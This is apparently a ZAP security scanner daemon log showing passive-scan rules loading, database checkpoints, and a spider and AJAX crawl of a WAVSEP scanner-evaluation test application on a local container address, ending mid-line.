org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Information Disclosure - Sensitive Information in HTTP Referrer Header 65697 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Information Disclosure - Suspicious Comments 65698 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Weak Authentication Method 65698 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Insecure JSF ViewState 65698 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: HTTP Parameter Override 65698 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Viewstate Scanner 76731 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Wappalyzer scanner (tech detection) 76768 [ZAP-PassiveScanner] ERROR org.zaproxy.zap.extension.pscan.PassiveScanThread - Parser failed on record 347 from History table java.util.ConcurrentModificationException at java.util.ArrayList$Itr.checkForComodification(ArrayList.java:859) at java.util.ArrayList$Itr.next(ArrayList.java:831) at org.zaproxy.zap.extension.pscan.PassiveScanThread.run(Unknown Source) 78066 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Base64 Disclosure 78082 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Big Redirect Detected (Potential Sensitive Information Leak) 78082 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Content Cacheability 78082 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Content Security Policy (CSP) Header Not Set 78083 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Cross-Domain Misconfiguration 78083 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Directory Browsing 78083 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: An example passive scan rule which loads data from a file 78083 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Example Passive Scanner: Denial of Service 78083 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Hash Disclosure 78083 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Heartbleed OpenSSL Vulnerability (Indicative) 78083 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Image Location Scanner 78083 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Insecure Component 78083 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: HTTP to HTTPS Insecure Transition in Form Post 78083 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: HTTPS to HTTP Insecure Transition in Form Post 78083 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Retrieved from Cache 78084 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Server Leaks Version Information via "Server" HTTP Response Header Field 78084 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Source Code Disclosure 78084 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Strict-Transport-Security Header Not Set 78084 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Timestamp Disclosure 78084 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: User Controllable Charset 78084 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Cookie Poisoning 78084 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: User Controllable HTML Element Attribute (Potential XSS) 78084 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: User Controllable JavaScript Event (XSS) 78084 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Open Redirect 78084 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: X-Backend-Server Header Information Leak 78084 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: X-ChromeLogger-Data (XCOLD) Header Information Leak 78084 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Server Leaks Information via "X-Powered-By" HTTP Response Header Field(s) 78067 [ZAP-PassiveScanner] ERROR org.zaproxy.zap.extension.pscan.PassiveScanThread - Parser failed on record 418 from History table java.util.ConcurrentModificationException at java.util.ArrayList$Itr.checkForComodification(ArrayList.java:859) at java.util.ArrayList$Itr.next(ArrayList.java:831) at org.zaproxy.zap.extension.pscan.PassiveScanThread.run(Unknown Source) 80462 [ZAP-daemon] INFO org.zaproxy.zap.DaemonBootstrap - ZAP is now listening on 0.0.0.0:8090 217598 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 217599 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 217618 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 218089 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 218093 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 294515 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 294515 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 294551 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 295318 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 295321 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 321256 [pool-1-thread-1] WARN org.zaproxy.zap.spider.URLCanonicalizer - Error while Processing URL in the spidering process (on base http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/Case03-Redirect-RedirectMethod-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=httk://google.com): unknown protocol: httk 321711 [pool-1-thread-2] WARN org.zaproxy.zap.spider.URLCanonicalizer - Error while Processing URL in the spidering process (on base http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/Case07-Redirect-RedirectMethod-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-PartialPathReq-Read.jsp?target): Expected authority at index 7: http:// 344886 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 344887 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 344900 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 346530 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 346532 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 352507 [pool-1-thread-2] INFO org.zaproxy.zap.spider.Spider - Spidering process is complete. Shutting down... 352509 [Thread-62] INFO org.zaproxy.zap.extension.spider.SpiderThread - Spider scanning complete: true 358977 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 358977 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 358991 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 360829 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 360831 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 361841 [Thread-63] INFO org.zaproxy.zap.extension.spiderAjax.SpiderThread - Running crawljax targeting http://172.17.0.2:8080/wavsep/index-active.jsp 361841 [Thread-63] INFO org.zaproxy.zap.extension.spiderAjax.SpiderThread - Starting proxy... 361842 [Thread-63] INFO org.zaproxy.zap.extension.spiderAjax.SpiderThread - Proxy started, listening at port [40325]. 363160 [Thread-63] WARN com.crawljax.core.plugin.Plugins - No plugins loaded. There will be no output 374687 [ZAP-ProxyThread-139] INFO org.zaproxy.zap.extension.httpsessions.HttpSessionsSite - Created a new session as no match was found: HttpSession [name=Session 6, active=false, tokenValues=''] 374987 [ZAP-ProxyThread-139] INFO org.zaproxy.zap.extension.httpsessions.HttpSessionsSite - Created a new session as no match was found: HttpSession [name=Session 7, active=false, tokenValues=''] 376356 [Thread-63] INFO com.crawljax.core.UnfiredCandidateActions - There are 1 states with unfired actions 376356 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 1 states with unfired actions 379236 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state1 added to the StateMachine. 379236 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 1 379292 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 1 states with unfired actions 381163 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state2 added to the StateMachine. 381163 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 2 381226 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 383437 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state3 added to the StateMachine. 383437 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 383781 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 3 states with unfired actions 385835 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state4 added to the StateMachine. 385835 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 385861 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 3 states with unfired actions 388341 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 389748 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state5 added to the StateMachine. 389749 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 2 389801 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 4 states with unfired actions 391474 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state6 added to the StateMachine. 391475 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 391574 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 5 states with unfired actions 393404 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state7 added to the StateMachine. 393404 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 393441 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 5 states with unfired actions 395900 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 397217 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 399022 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state8 added to the StateMachine. 399022 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 399099 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 6 states with unfired actions 400805 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state9 added to the StateMachine. 400805 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 400843 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 7 states with unfired actions 402550 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state10 added to the StateMachine. 402550 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 5 402585 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 6 states with unfired actions 406384 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 407715 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 409132 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 410698 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state11 added to the StateMachine. 410698 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 410725 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 6 states with unfired actions 413237 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 414715 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state12 added to the StateMachine. 414715 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 2 414736 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 7 states with unfired actions 417389 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state13 added to the StateMachine. 417390 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 417899 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 8 states with unfired actions 420515 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state14 added to the StateMachine. 420516 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 420590 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 8 states with unfired actions 423164 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 424485 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 426046 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state15 added to the StateMachine. 426046 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 426079 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 9 states with unfired actions 427958 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state16 and state7 are the same. 427977 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 9 states with unfired actions 430544 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 431945 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 433276 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 434816 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state17 added to the StateMachine. 434833 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 434946 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 9 states with unfired actions 437554 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 438878 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 440377 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state18 added to the StateMachine. 440377 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 440400 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 9 states with unfired actions 442896 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 444222 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 445766 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 447334 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state19 added to the StateMachine. 447334 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 447441 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 9 states with unfired actions 449998 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 451336 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 452711 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 454354 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state20 added to the StateMachine. 454354 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 454378 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 9 states with unfired actions 456811 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 458473 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state21 added to the StateMachine. 458473 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 2 458554 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 10 states with unfired actions 460116 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state22 added to the StateMachine. 460116 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 460150 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 11 states with unfired actions 461550 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state23 and state14 are the same. 461571 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 11 states with unfired actions 464093 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 465560 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 467936 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state24 added to the StateMachine. 467936 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 468213 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 12 states with unfired actions 471038 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state25 and state14 are the same. 471060 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 12 states with unfired actions 473813 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 475151 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 476905 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 480265 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state26 added to the StateMachine. 480266 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 480312 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 12 states with unfired actions 482796 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 484122 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 485664 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state27 added to the StateMachine. 485664 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 485717 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 13 states with unfired actions 487333 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state28 added to the StateMachine. 487333 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 487374 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 13 states with unfired actions 490032 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 491433 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 492864 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 494349 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state29 and state17 are the same. 494366 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 13 states with unfired actions 496817 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 498056 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 499433 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 500944 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state30 added to the StateMachine. 500944 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 500975 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 13 states with unfired actions 503462 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 504359 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 504359 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 504367 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 504803 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 505578 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 505580 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 506156 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state31 added to the StateMachine. 506156 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 506188 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 14 states with unfired actions 507731 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state32 added to the StateMachine. 507731 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 507775 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 14 states with unfired actions 510384 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 511888 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 513284 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 514804 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state33 added to the StateMachine. 514804 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 514834 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 14 states with unfired actions 517404 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 518801 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 520147 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 521671 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state34 added to the StateMachine. 521671 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 521716 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 14 states with unfired actions 524151 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 525598 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state35 added to the StateMachine. 525598 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 2 525635 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 15 states with unfired actions 527430 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state36 added to the StateMachine. 527430 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 527499 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 16 states with unfired actions 529161 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state37 added to the StateMachine. 529161 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 529199 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 16 states with unfired actions 531935 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 533389 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 534894 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state38 added to the StateMachine. 534894 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 534981 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 17 states with unfired actions 536833 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state39 and state14 are the same. 536877 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 17 states with unfired actions 539684 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 541047 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 542419 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 544093 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state40 and state14 are the same. 544097 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 17 states with unfired actions 546597 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 547882 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 550225 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state41 added to the StateMachine. 550226 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 550591 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 18 states with unfired actions 553032 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state42 and state14 are the same. 553037 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 18 states with unfired actions 555597 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 556943 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 558939 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 561653 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state43 added to the StateMachine. 561653 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 561690 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 18 states with unfired actions 564099 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 565415 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 567127 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 569846 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state44 added to the StateMachine. 569846 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 569867 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 18 states with unfired actions 572371 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 573774 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 575219 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state45 added to the StateMachine. 575219 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 575242 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 19 states with unfired actions 576780 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state46 added to the StateMachine. 576780 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 576816 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 19 states with unfired actions 579353 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 580685 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 582010 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 583503 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state47 added to the StateMachine. 583503 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 583529 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 19 states with unfired actions 586128 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 587485 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 588840 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 590529 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state48 and state30 are the same. 590534 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 19 states with unfired actions 593039 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 594344 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 595659 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 597302 